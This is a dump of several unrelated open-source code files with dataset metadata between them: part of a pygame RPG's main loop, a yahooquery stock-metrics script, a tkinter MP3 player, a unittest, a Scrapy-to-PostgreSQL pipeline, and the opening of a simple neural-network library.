mob.last_wall_hit = pg.time.get_ticks()\n                                mob.seek_random_target()\n                    elif elev.elevation - mob.elevation > 1:\n                        if (not mob.flying) and (mob in self.animals_on_screen):\n                            mob.hit_wall = True\n                        elif (mob in self.companions) or mob.target == self.player:\n                            mob.jumping = True\n                            mob.last_climb = pg.time.get_ticks()\n                        elif mob in self.npcs_on_screen:\n                            chance = randrange(0, 200)\n                            if chance == 1:\n                                mob.jumping = True\n                            else:\n                                mob.hit_wall = True\n                                mob.last_wall_hit = pg.time.get_ticks()\n                                mob.seek_random_target()\n                    else:\n                        mob.climbing = False\n                        if not mob.jumping:\n                            if mob.elevation > 1:\n                                mob.falling = True\n                                mob.pre_jump()\n                                mob.elevation = 0\n        \n        # fireball hits firepit\n        hits = pg.sprite.groupcollide(self.firepits, self.fireballs, False, False, fire_collide)\n        for item in hits:\n            for bullet in hits[item]:\n                if not item.lit:\n                    bullet.explode(item)\n                    item.lit = True\n                    center = vec(item.rect.center)\n                    Stationary_Animated(self, center, 'fire')\n                    #Work_Station(self, center.x - self.map.tile_size/2, center.y - self.map.tile_size/2, self.map.tile_size, self.map.tile_size, 'cooking fire')\n        # fire hits firepit\n        hits = pg.sprite.groupcollide(self.firepits, self.fires_on_screen, False, False, pg.sprite.collide_circle_ratio(0.5))\n        for item in hits:\n            if not item.lit:\n                item.lit = True\n                center = vec(item.rect.center)\n                Stationary_Animated(self, center, 'fire')\n                #Work_Station(self, center.x - self.map.tile_size/2, center.y - self.map.tile_size/2, self.map.tile_size, self.map.tile_size, 'cooking fire')\n\n\n        # vehicle hit breakable\n        hits = pg.sprite.groupcollide(self.breakable_on_screen, self.vehicles_on_screen, False, False, vehicle_collide_any)\n        for breakable in hits:\n            for vehicle in hits[breakable]:\n                if not vehicle.flying:\n                    breakable.gets_hit(vehicle.cat, 0, 0, 0)\n\n        # explosion 
hit breakable\n hits = pg.sprite.groupcollide(self.breakable_on_screen, self.explosions, False, False, pg.sprite.collide_circle_ratio(0.5))\n for breakable in hits:\n for exp in hits[breakable]:\n if exp.damage > 200:\n breakable.gets_hit('explosion', 0, 0, 0)\n \n # fireball hits firepot\n hits = pg.sprite.groupcollide(self.firepots, self.fireballs, False, False, fire_collide)\n for pot in hits:\n pot.hit = True\n for bullet in hits[pot]:\n bullet.explode()\n self.player.stats['marksmanship hits'] += 1\n\n # dropped item hit water\n hits = pg.sprite.groupcollide(self.dropped_items_on_screen, self.water_on_screen, False, False)\n for hit in hits:\n if 'dead' in hit.item and 'fish' in hit.item:\n if hit.dropped_fish:\n animal_dict = self.animals_dict[hit.item[5:]]\n animal_name = animal_dict['name']\n Animal(self, hit.pos.x, hit.pos.y, animal_name)\n hit.kill()\n elif not hit.floats:\n hit.kill()\n\n # detectable hit detector\n hits = pg.sprite.groupcollide(self.detectors, self.detectables, False, False)\n for detector in hits:\n if not detector.detected:\n for detectable in hits[detector]:\n if detector.item in detectable.name:\n detector.trigger(detectable)\n if detector.kill_item:\n detectable.kill()\n\n # npc hits doors and opens them\n hits = pg.sprite.groupcollide(self.npcs_on_screen, self.entryways_on_screen, False, False, entryway_collide)\n for npc in hits:\n for entryway in hits[npc]:\n if not entryway.locked:\n if not entryway.opened:\n entryway.open = True\n entryway.close = False\n elif npc.target in self.entryways_on_screen:\n if not entryway.open:\n entryway.close = True\n\n # land vehicle hits water\n hits = pg.sprite.groupcollide(self.land_vehicles, self.water_on_screen, False, False)\n for vcle in hits:\n vcle.gets_hit(2, 0, 0)\n\n # npc hit AI path\n hits = pg.sprite.groupcollide(self.npcs_on_screen, self.aipaths, False, False)\n for npc in self.npcs_on_screen:\n if npc in hits:\n now = pg.time.get_ticks()\n if now - npc.last_path_change > 3000:\n npc.aipath = hits[npc] #sets aipath to list of paths hit\n else:\n npc.aipath = None\"\"\"\n\n def render_lighting(self, underworld = False):\n for sprite in self.sprites_on_screen:\n if sprite in self.lights:\n self.lights_on_screen.add(sprite)\n\n # draw the light mask (gradient) onto fog image\n if self.underworld:\n self.fog.fill((180, 180, 180))\n else:\n self.fog.fill(self.dark_color)\n\n # tile_based flame lights\n xi, xf, yi, yf = self.map.get_tiles_on_screen(self.player.pos.x, self.player.pos.y)\n for y in range(yi, yf):\n for x in range(xi, xf):\n # When you are outside, lights inside should be off, otherwise all lights should be on.\n if self.map.stored_map_data.lights[y][x]:\n if (not self.player_inside and not ('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))) or self.player_inside and (('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))): # Prevents drawing lights inside houses so they don't shine through roofs when you are outside.\n if self.map.stored_map_data.lights[y][x] == 'flame':\n light_mask = self.flame_light_mask\n light_mask_rect = self.flame_light_mask_rect\n elif self.map.stored_map_data.lights[y][x] == 'coals':\n light_mask = self.coals_light_mask\n light_mask_rect = self.coals_light_mask_rect\n elif self.map.stored_map_data.lights[y][x] == 'candle':\n light_mask = self.candle_light_mask\n light_mask_rect = self.candle_light_mask_rect\n light_mask_rect.center = (x * self.map.tile_size + self.map.tile_size/2, y * self.map.tile_size + 
self.map.tile_size/2)\n                        lightrect = self.camera.apply_rect(light_mask_rect)\n                        self.fog.blit(light_mask, lightrect)\n\n        for light in self.lights_on_screen:\n            x, y = self.map.get_tile_pos(light.pos.x, light.pos.y)\n            if (light == self.player) or (not self.player_inside and not ('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))) or self.player_inside and (('roof' in self.map.tile_props[y][x] and (self.map.tile_props[y][x]['roof'] != ''))): # Prevents drawing lights inside houses so they don't shine through roofs.\n                lightrect = self.camera.apply_rect(light.light_mask_rect)\n                self.fog.blit(light.light_mask, lightrect)\n\n        self.screen.blit(self.fog, (0, 0), special_flags=pg.BLEND_RGB_SUB)\n\n    def rot_center(self, image, angle):\n        orig_rect = image.get_rect()\n        rot_image = pg.transform.rotate(image, angle)\n        rot_rect = orig_rect.copy()\n        rot_rect.center = rot_image.get_rect().center\n        rot_image = rot_image.subsurface(rot_rect).copy()\n        return rot_image\n\n    def draw_minimap(self):\n        mini_rect = pg.Rect((self.screen_width - self.map.minimap.rect.width), 0, self.map.minimap.rect.width, self.map.minimap.rect.height)\n        width = self.screen_width - self.map.minimap.rect.width\n        scale = self.map.minimap.rect.width / self.map.width\n        map_pos = vec(self.player.rect.center) * scale\n        pos_rect = pg.Rect(0, 0, 20, 20)\n        pos_rect.center = (int(map_pos.x + width), int(map_pos.y))\n        temp_compass_img = self.rot_center(self.compass_image.copy(), self.compass_rot)\n        self.screen.blit(self.map.minimap.image, (width, 0))\n        self.screen.blit(temp_compass_img, (width - self.map.tile_size, 0))\n        pg.draw.rect(self.screen, WHITE, mini_rect, 2)\n        pg.draw.rect(self.screen, YELLOW, pos_rect, 1)\n\n    def draw_overmap(self):\n        cell_width = self.screen_height / len(self.map_data_list[0])\n        cell_height = self.screen_height / len(self.map_data_list)\n        offsetx = int(self.world_location.x * cell_width)\n        offsety = int(self.world_location.y * cell_height)\n        scalex = cell_width / self.map.width\n        scaley = cell_height / self.map.height\n        currentmap_rect = pg.Rect(0, 0, cell_width, cell_height)\n        currentmap_rect.topleft = (offsetx, offsety)\n        map_pos = vec(self.player.rect.centerx * scalex, self.player.rect.centery * scaley)\n        pos_rect = pg.Rect(0, 0, 3, 3)\n        pos_rect.center = (int(map_pos.x + offsetx), int(map_pos.y + offsety))\n        self.screen.blit(self.over_minimap_image, (0, 0))\n        pg.draw.rect(self.screen, YELLOW, currentmap_rect, 4)\n        pg.draw.rect(self.screen, RED, pos_rect, 4)\n\n\n    def draw(self):\n        pg.display.set_caption(\"Legends of Zhara\")\n        #self.group.draw(self.screen, self) # Used with my monkey patched version of the old pyscroll.\n        self.group.draw(self.screen)\n\n        # Only draws roofs when outside of buildings\n        hits = pg.sprite.spritecollide(self.player, self.inside_on_screen, False)\n        if not (hits or self.player.inside):\n            self.player_inside = False\n        else:\n            self.player_inside = True\n        if self.player.in_vehicle:\n            if self.player.vehicle in self.flying_vehicles:\n                self.player_inside = False\n\n        # Draws flying vehicle sprites after roofs.\n        #for sprite in self.flying_vehicles:\n        #    self.screen.blit(sprite.image, self.camera.apply(sprite))\n\n        if self.underworld:\n            self.render_lighting(True)\n        elif True in [self.night, self.sunrise, self.nightfall]:\n            self.render_lighting()\n        #if self.hud_map:\n        #    self.draw_minimap()\n        if self.hud_overmap:\n            self.draw_overmap()\n\n        if self.draw_debug: # Draws hit rects for debugging\n            #for wall_rect in self.map.walls_list:\n            #    pg.draw.rect(self.screen, CYAN, 
self.camera.apply_rect(wall_rect), 1)\n for ai in self.ais:\n for i, path in enumerate(ai.found_path):\n pathrect = pg.Rect(path.pos[0] * self.map.tile_size, path.pos[1] * self.map.tile_size, self.map.tile_size, self.map.tile_size)\n pg.draw.rect(self.screen, RED, self.camera.apply_rect(pathrect), 1)\n if ai.meander:\n pathrect = pg.Rect(ai.temp_target[0] * self.map.tile_size, ai.temp_target[1] * self.map.tile_size, self.map.tile_size,\n self.map.tile_size)\n pg.draw.rect(self.screen, RED, self.camera.apply_rect(pathrect), 1)\n for vehicle in self.vehicles_on_screen:\n pg.draw.rect(self.screen, CYAN, self.camera.apply_rect(vehicle.hit_rect), 1)\n pg.draw.rect(self.screen, GREEN, self.camera.apply_rect(vehicle.hit_rect2), 1)\n pg.draw.rect(self.screen, RED, self.camera.apply_rect(vehicle.hit_rect3), 1)\n for mob in self.mobs_on_screen:\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(mob.hit_rect), 1)\n for item in self.dropped_items:\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(item.hit_rect), 1)\n #for npc in self.npcs_on_screen:\n # pg.draw.rect(self.screen, WHITE, self.camera.apply_rect(npc.temp_target.hit_rect), 1)\n for target in self.random_targets:\n pg.draw.rect(self.screen, BLUE, self.camera.apply_rect(target.rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.hit_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.mid_weapon_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.weapon_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.mid_weapon2_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.weapon2_melee_rect), 1)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(self.player.body.melee2_rect), 1)\n #for elev in self.elevations_on_screen:\n # pg.draw.rect(self.screen, BLUE, self.camera.apply_rect(elev.rect), 1)\n\n self.inventory_hud_icons.draw(self.screen)\n if self.selected_hud_item:\n pg.draw.rect(self.screen, YELLOW, self.selected_hud_item.rect, 1)\n\n if ('type' in self.player.hand2_item) and (self.player.hand2_item['type'] == 'block') or ('type' in self.player.hand_item) and (self.player.hand_item['type'] == 'block'):\n x, y = get_next_tile_pos(self.player)\n pg.draw.rect(self.screen, YELLOW, self.camera.apply_rect(pg.Rect(x * self.map.tile_size, y * self.map.tile_size, self.map.tile_size, self.map.tile_size)), 1)\n\n # HUD functions\n draw_player_stats(self.screen, 10, 10, self.hud_health)\n draw_player_stats(self.screen, 10, 40, self.hud_stamina, BLUE)\n draw_player_stats(self.screen, 10, 70, self.hud_magica, CYAN)\n if self.show_mobhp:\n draw_player_stats(self.screen, int(self.screen_width/2 - 150), self.screen_height - 70, self.hud_mobhp, BLUE, 300)\n if self.player.hungers:\n draw_player_stats(self.screen, 10, 100, self.hud_hunger, BROWN)\n self.draw_text(\"HGR {:.0f}\".format(self.player.stats['hunger']), self.hud_font, 20, WHITE, 120, 100, align=\"topleft\")\n draw_crosshair = False\n if self.hud_ammo1 != '':\n self.draw_text(self.hud_ammo1, self.hud_font, 20, WHITE, 50, self.screen_height - 100, align=\"topleft\")\n draw_crosshair = True\n if self.hud_ammo2 != '':\n self.draw_text(self.hud_ammo2, self.hud_font, 20, WHITE, 50, self.screen_height - 50, align=\"topleft\")\n draw_crosshair = True\n if draw_crosshair:\n pg.mouse.set_visible(False)\n mouse_pos = 
pg.mouse.get_pos()\n self.screen.blit(self.crosshair_image, (mouse_pos[0] - self.crosshair_offset, mouse_pos[1] - self.crosshair_offset))\n elif not pg.mouse.get_visible():\n pg.mouse.set_visible(True)\n if self.paused:\n self.screen.blit(self.dim_screen, (0, 0))\n self.draw_text(\"Paused\", self.title_font, 105, RED, self.screen_width / 2, self.screen_height / 2, align=\"center\")\n if self.message_text == True:\n self.draw_text(self.message, self.hud_font, 30, WHITE, self.screen_width / 2, self.screen_height / 2 + 100, align=\"center\")\n self.draw_text(\"FPS {:.0f}\".format(1/self.dt), self.hud_font, 20, WHITE, self.screen_width/2, 10, align=\"topleft\")\n self.draw_text(\"HP {:.0f}\".format(self.hud_health_stats['health']), self.hud_font, 20, WHITE, 120, 10, align=\"topleft\")\n self.draw_text(\"ST {:.0f}\".format(self.player.stats['stamina']), self.hud_font, 20, WHITE, 120, 40, align=\"topleft\")\n self.draw_text(\"MP {:.0f}\".format(self.player.stats['magica']), self.hud_font, 20, WHITE, 120, 70, align=\"topleft\")\n\n pg.display.flip()\n self.wt = self.beg + (1 / FPS)\n while (perf_counter() < self.wt):\n pass\n self.dt = perf_counter() - self.beg\n if self.dt > 0.2: # Caps dt at 200 ms.\n self.dt = 0.2\n self.beg = perf_counter()\n if self.in_lock_menu:\n self.lock_menu.update()\n if self.in_dialogue_menu:\n self.dialogue_menu.update()\n\n def change_right_equipped(self, slot):\n self.player.empty_mags() # unloads old weapon\n self.player.hand_item = self.player.equipped[slot]\n if ('type' in self.player.hand_item) and (self.player.hand_item['type'] in WEAPON_TYPES):\n self.player.equipped['weapons'] = self.player.hand_item\n else:\n self.player.equipped['weapons'] = None\n for icon in self.inventory_hud_icons:\n if int(icon.slot_text) == slot + 1:\n self.selected_hud_item = icon\n self.player.lamp_check()\n self.player.human_body.update_animations() # Updates animations for newly equipped or removed weapons etc.\n self.player.dragon_body.update_animations()\n self.player.pre_reload() # reloads new weapon\n\n def use_item(self, slot):\n self.change_right_equipped(slot)\n self.player.use_item(self.selected_hud_item.item, slot)\n\n def place_item(self):\n if self.selected_hud_item:\n slot = int(self.selected_hud_item.slot_text) - 1\n self.player.place_item(slot)\n\n def events(self):\n # catch all events here\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.quit()\n # Shooting/attacking\n if event.type == pg.MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n # get a list of all heading sprites that are under the mouse cursor\n self.clicked_sprites = [s for s in self.inventory_hud_icons if s.rect.collidepoint(pos)]\n if self.clicked_sprites:\n if pg.mouse.get_pressed() == (1, 0, 0):\n self.change_right_equipped(int(self.clicked_sprites[0].slot_text) - 1)\n elif pg.mouse.get_pressed() == (0, 0, 1):\n self.use_item(int(self.clicked_sprites[0].slot_text) - 1)\n if pg.mouse.get_pressed() == (1, 0, 1):\n self.player.dual_shoot()\n elif pg.mouse.get_pressed() == (0, 0, 1) or pg.mouse.get_pressed() == (0, 1, 1):\n if ('type' in self.player.hand_item) and (self.player.hand_item['type'] == 'block'):\n self.player.place_block(1)\n elif ('type' in self.player.hand_item) and (self.player.hand_item['type'] == 'magic'):\n self.player.weapon_hand = 'weapons'\n self.player.cast_spell(self.player.hand_item)\n else:\n self.player.weapon_hand = 'weapons'\n self.player.shoot()\n elif pg.mouse.get_pressed() == (1, 0, 0) or pg.mouse.get_pressed() == (1, 1, 0):\n if ('type' in 
self.player.hand2_item) and (self.player.hand2_item['type'] == 'block'):\n self.player.place_block(2)\n elif ('type' in self.player.hand2_item) and (self.player.hand2_item['type'] == 'magic'):\n self.player.weapon_hand = 'weapons2'\n self.player.cast_spell(self.player.hand2_item)\n else:\n self.player.weapon_hand = 'weapons2'\n self.player.shoot()\n else: # Prevents e_down from getting stuck on true\n self.player.e_down = False\n if event.type == pg.MOUSEBUTTONUP: # Updates which hand should be attacking when mouse buttons change.\n if pg.mouse.get_pressed() == (0, 0, 1) or pg.mouse.get_pressed() == (0, 1, 1):\n self.player.weapon_hand = 'weapons'\n elif pg.mouse.get_pressed() == (1, 0, 0) or pg.mouse.get_pressed() == (1, 1, 0):\n self.player.weapon_hand = 'weapons2'\n else: # Prevents e_down from getting stuck on true\n self.player.e_down = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_1:\n self.change_right_equipped(0)\n elif event.key == pg.K_2:\n self.change_right_equipped(1)\n elif event.key == pg.K_3:\n self.change_right_equipped(2)\n elif event.key == pg.K_4:\n self.change_right_equipped(3)\n elif event.key == pg.K_5:\n self.change_right_equipped(4)\n elif event.key == pg.K_6:\n self.change_right_equipped(5)\n if event.key == pg.K_ESCAPE:\n MainMenu(self, self.player, 'Game')\n if event.key == self.key_map['inventory']:\n self.player.empty_mags() # This makes sure the bullets in your clip don't transfer to the wrong weapons if you switch weapons in your inventory\n MainMenu(self, self.player)\n if event.key == self.key_map['interact']:\n self.player.e_down = True\n else:\n self.player.e_down = False\n #if event.key == pg.K_BACKQUOTE: # Switches to last weapon\n # self.player.toggle_previous_weapons()\n if event.key == self.key_map['reload']:\n self.player.pre_reload()\n if event.key == self.key_map['hitbox']:\n self.draw_debug = not self.draw_debug\n if event.key == self.key_map['pause']:\n trace_mem()\n self.paused = not self.paused\n self.beg = perf_counter() # resets dt.\n if event.key == pg.K_EQUALS:\n self.map.minimap.resize()\n if event.key == pg.K_MINUS:\n self.map.minimap.resize(False)\n if event.key == self.key_map['minimap']: # Toggles hud mini map\n self.hud_map = not self.hud_map\n if event.key == self.key_map['place']:\n self.place_item()\n if event.key == self.key_map['block']:\n self.player.place_block()\n if event.key == self.key_map['grenade']:\n self.player.throw_grenade()\n if event.key == self.key_map['transform']:\n if self.player.possessing == None:\n self.player.transform()\n else:\n self.player.possessing.depossess()\n\n if event.key == self.key_map['fire']:\n if self.player.dragon:\n self.player.breathe_fire()\n if event.key == self.key_map['lamp']:\n self.player.light_on = not self.player.light_on\n if event.key == self.key_map['up']:\n if self.player.in_vehicle:\n if self.player.vehicle in self.flying_vehicles:\n self.fly_menu = Fly_Menu(self)\n if event.key == pg.K_RETURN: # Toggles fullscreen mode when you press ALT+ENTER\n if event.mod & pg.KMOD_ALT:\n self.flags ^= pg.FULLSCREEN\n if self.flags & pg.FULLSCREEN:\n self.screen_height = HEIGHT\n else:\n self.screen_height = HEIGHT\n pg.display.set_mode((self.screen_width, self.screen_height), self.flags)\n if event.key == pg.K_s: # Saves game\n if event.mod & pg.KMOD_CTRL:\n self.save()\n if event.key == pg.K_l: # loads game\n if event.mod & pg.KMOD_CTRL:\n pass\n if event.key == self.key_map['jump']:\n self.player.pre_jump()\n\n def show_go_screen(self):\n self.screen.fill(BLACK)\n 
self.draw_text(\"GAME OVER\", self.title_font, 100, RED,\n self.screen_width / 2, self.screen_height / 2, align=\"center\")\n self.draw_text(\"Press Escape to quit, C to continue or N to start a new game.\", self.script_font, 16, WHITE,\n self.screen_width / 2, self.screen_height * 3 / 4, align=\"center\")\n pg.display.flip()\n self.wait_for_key()\n self.garbage_collect()\n\n def wait_for_key(self):\n pg.event.wait()\n waiting = True\n while waiting:\n self.clock.tick(FPS)\n for event in pg.event.get():\n if event.type == pg.QUIT:\n waiting = False\n self.quit()\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_ESCAPE:\n waiting = False\n self.quit()\n elif event.key == pg.K_c:\n waiting = False\n self.player.stats['health'] = self.player.stats['max health']\n #self.in_load_menu = True\n self.run()\n elif event.key == pg.K_n:\n waiting = False\n\n# create the game object\ng = Game()\nwhile True:\n g.new()\n g.run()\n g.show_go_screen()\n","repo_name":"ravenironwing/Sky-Realm-Legends-of-Arroshay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":138567,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"3480200011","text":"symbol = \"INFY.NS\"\n\nfrom yahooquery import Ticker\nimport pandas as pd\nimport streamlit as st\n\nstock1 = Ticker(symbol)\nModules = stock1.all_modules\nQuotes = stock1.quotes\nFin_Data = stock1.financial_data\nSum_Data = stock1.summary_detail\n\ndf = pd.DataFrame(columns = ['Market Cap', 'EPS'])\n\ncur = Quotes[symbol]['currency']\n#st.header(\"Market Currency:\")\n#st.subheader(cur)\n#st.caption(\"All metrics will be in this currency\")\n\nname = Quotes[symbol]['longName']\n\nsector = Modules[symbol]['assetProfile']['sector']\n\n\nmarket_cap = (Sum_Data[symbol]['marketCap'])\nmarket_cap = round(market_cap)\n\neps = Quotes[symbol]['epsTrailingTwelveMonths']\neps = round(eps,2)\n\nroe = Fin_Data[symbol]['returnOnEquity']*100\nroe = round(roe,2)\n\n\npe = Quotes[symbol]['trailingPE']\npe = round(pe,2)\n\n\ndte = Fin_Data[symbol]['debtToEquity']\ndte = round(dte,2)\n\n\npb = Quotes[symbol]['priceToBook']\npb = round(pb,2)\n\n\nps = Sum_Data[symbol]['priceToSalesTrailing12Months']\nps = round(ps,2)\n\npeg = Modules[symbol]['indexTrend']['pegRatio']\npeg = round(peg,2)\n \n\ncr = Fin_Data[symbol]['currentRatio']\ncr = round(cr,2)\n\n\ntry:\n dy = Sum_Data[symbol]['dividendYield']*100\n dy = round(dy,2)\nexcept KeyError:\n dy = Sum_Data[symbol]['dividendYield'] = \"n/A\"\n\ninsiders = Modules[symbol]['defaultKeyStatistics']['heldPercentInsiders']*100\ninsiders = round(insiders,2)\n\nprint(Quotes)","repo_name":"ManavMuthanna/invEZt","sub_path":"details.py","file_name":"details.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37689766600","text":"from tkinter import*\r\nimport pygame, sys\r\nfrom pygame.locals import*\r\nfrom tkinter import filedialog\r\nfrom PIL import ImageTk, Image\r\nimport os\r\n\r\npygame.init() #Iniciamos modulo de Pygame\r\n#Funcion abrir cancion\r\ndef abrirarchivo():\r\n cancion = filedialog.askopenfilename() #Guardar el nombre de la cancion\r\n print(cancion)\r\n pygame.mixer.music.load(cancion)\r\n\r\ndef playsong():\r\n pygame.mixer.music.play()\r\n\r\ndef stop():\r\n pygame.mixer.music.stop()\r\n\r\ndef pause():\r\n pygame.mixer.music.pause()\r\n\r\ndef resume():\r\n pygame.mixer.music.unpause()\r\n\r\ndef volmas():\r\n VolUp = 
pygame.mixer.music.get_volume()+0.5\r\n    print(VolUp)\r\n    pygame.mixer.music.set_volume(VolUp)\r\n\r\n\r\ndef volMenos():\r\n    VolLow = pygame.mixer.music.get_volume()-0.5\r\n    print(VolLow)\r\n    pygame.mixer.music.set_volume(VolLow)\r\n\r\n\r\nraiz = Tk() # Instantiate the Tk object\r\nraiz.title(\"Reproductor MP3 _ GUI\") # Set the window title\r\n#raiz.iconbitmap(\"disk-jockey.ico\")\r\nraiz.geometry(\"500x500\")\r\nraiz.resizable(0,0)\r\n\r\n# Create the main frame\r\nframePrincipal = Frame(raiz,bg=\"#4A4A4A\")\r\nframePrincipal.pack(fill=\"both\",expand=1) #FBFBFB \r\n# Title label for the player; bold makes it boldface\r\ntituloReproductor = Label(framePrincipal, text=\"ROCOLA KOMANDER\", font=(\"Roboto\",30,\"bold\"),bg=\"#4A4A4A\",fg=\"#FBFBFB\")\r\ntituloReproductor.place(relx=0.12,rely=0.3)\r\n# MAKE THE BUTTONS. Button 1 opens the song; font changes the typeface\r\nbotonOpenSong = Button(framePrincipal,text=\"Open Song\",bg=\"#42AB49\",fg=\"#FBFBFB\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=abrirarchivo)\r\nbotonOpenSong.place(relx=0.1,rely=0.5)\r\n# Play Song button 2\r\nbotonPLaySong = Button(framePrincipal,text=\"Puchale pley\",bg=\"#1DD4AA\",fg=\"#FBFBFB\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=playsong)\r\nbotonPLaySong.place(relx=0.1,rely=0.8)\r\n# Stop button 3\r\nbotonStop = Button(framePrincipal,text=\"Stop\",bg=\"#1DD4AA\",fg=\"#FBFBFB\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=stop)\r\nbotonStop.place(relx=0.6,rely=0.5)\r\n# Resume button 4\r\nbotonResume = Button(framePrincipal,text=\"Resume\",bg=\"#FF69B4\",fg=\"#e2504c\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=resume)\r\nbotonResume.place(relx=0.6,rely=0.8) \r\n# Pause button\r\nbotonPause = Button(framePrincipal,text=\"Pause\",bg=\"#1DD4AA\",fg=\"#550099\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=pause)\r\nbotonPause.place(relx=0.35,rely=0.65) \r\n# Volume up\r\nbotonVolumenmas= Button(framePrincipal,text=\"Vol. +\",bg=\"#808080\",fg=\"#550099\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=volmas)\r\nbotonVolumenmas.place(relx=0.15,rely=0.05)\r\n# Volume down\r\nbotonVolumenmenos = Button(framePrincipal,text=\"Vol. 
-\",bg=\"#808080\",fg=\"#550099\",font=(\"Roboto\",15,\"bold\"),width=12,height=2,command=volMenos)\r\nbotonVolumenmenos.place(relx=0.6,rely=0.05) \r\n\r\n\r\nraiz.mainloop()","repo_name":"fabiel00010/Reproductor","sub_path":"Interfas.py","file_name":"Interfas.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16483573794","text":"from unittest import TestCase, main\n\nfrom spiders.engine import CrawlerEngine\n\nclass TestCrawlerEngine(TestCase):\n\n def test_sync_all_nasdaq(self):\n engine = CrawlerEngine()\n engine.sync_all_nasdaq(\"/tmp/stocks\", '2010-01-01', '2020-12-04')\n\nif __name__ == '__main__':\n main()\n","repo_name":"xbkaishui/stock-spider","sub_path":"test/engine_test.py","file_name":"engine_test.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"31319270869","text":"# Define your item pipelines here\r\n#\r\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\r\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\r\n\r\n\r\n# useful for handling different item types with a single interface\r\nfrom itemadapter import ItemAdapter\r\nimport psycopg2\r\n\r\nclass SrealityPipeline:\r\n def __init__(self):\r\n # Connect to the PostgreSQL database\r\n hostname = 'db'\r\n username = 'luxonis'\r\n password = 'luxonis'\r\n database = 'luxonis'\r\n\r\n try:\r\n self.connection = psycopg2.connect(\r\n host=hostname,\r\n user=username,\r\n password=password,\r\n dbname=database\r\n )\r\n except psycopg2.Error as e:\r\n print(f\"Error connecting to database: {e}\")\r\n raise e\r\n \r\n # Create a table in the database\r\n self.cur = self.connection.cursor()\r\n self.cur.execute(\"\"\"\r\n DROP TABLE IF EXISTS sreality;\r\n CREATE TABLE IF NOT EXISTS sreality(\r\n id serial PRIMARY KEY, \r\n title text,\r\n img_url text\r\n );\r\n \"\"\")\r\n \r\n def process_item(self, item, spider):\r\n # Insert scraped data into the database\r\n try:\r\n self.cur.execute(\r\n \"INSERT INTO sreality (title, img_url) VALUES (%s, %s)\",\r\n (item[\"title\"], item[\"img_url\"])\r\n )\r\n self.connection.commit()\r\n \r\n except psycopg2.Error as e:\r\n print(f\"Error inserting data into database: {e}\")\r\n self.connection.rollback()\r\n raise e\r\n \r\n return item\r\n\r\n def close_spider(self, spider):\r\n # Close the cursor and database connection when the spider is done\r\n self.cur.close()\r\n self.connection.close()","repo_name":"borc23/SrealityLuxonis","sub_path":"Sreality/Sreality/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37875901080","text":"import sys\ninf = 2 ** 64\n#------------------------------------------------------------------------------\n# Artificial neurons can be used to emulate simple logic functions like\n# AND, OR, XOR etc. 
This library defines three simple classes \"neuron\", \"link\"\n# and \"timer\" to build a simple neural network and emulate logic functions.\n#------------------------------------------------------------------------------\nclass annErrors () :\n    def __init__(self) :\n        self.errMsg = {}\n        self.errMsg['001'] = \"\"\"\n        Cannot take input using 'input' method if the associated link type\n        is not 'input'.\n        \"\"\"\n        \n        self.errMsg['002'] = \"\"\"\n        Cannot extract values from a link using 'output' method if the \n        respective link type is not 'output'.\n        \"\"\"\n        \n        self.errMsg['003'] = \"\"\"\n        Cannot send output through a link whose type is neither\n        'input' nor 'output'.\n        \"\"\"\n        \n        self.errMsg['004'] = \"\"\"\n        An undefined link type was specified. Valid link types are 'input',\n        'output', and 'bias'.\n        \"\"\"\n        \n        self.errMsg['005'] = \"\"\"\n        Cannot set a bias input using setBiasInput to a link which \n        is not a bias.\n        \"\"\"\n    # end def\n    \n    def error (self, code) :\n        print(self.errMsg[code])\n        raise RuntimeError(self.errMsg[code]) \n    # end def\n# end class \n\n# Module-level error reporter used by the classes below.\nannErr = annErrors()\n\n#-------------------------------------------------------------------------------\n# This class is used to emulate a neuron. The neuron class has the following \n# attributes or properties.\n# 1) The lower threshold and upper threshold. If the total input is less than\n#    the lower threshold or greater than the upper threshold then the output of\n#    the neuron is zero, one otherwise.\n# 2) Array of incoming links.\n# 3) Array of outgoing links.\n# 4) The architectural layer to which the neuron belongs.\n# 5) The timer data structure that decides when this neuron should be \n#    activated.\n# Methods (public)\n# 1) input()    : Send input signal to the neuron.\n# 2) output()   : Read output signal from the neuron.\n# 3) activate() : activate the neuron. You will get the output 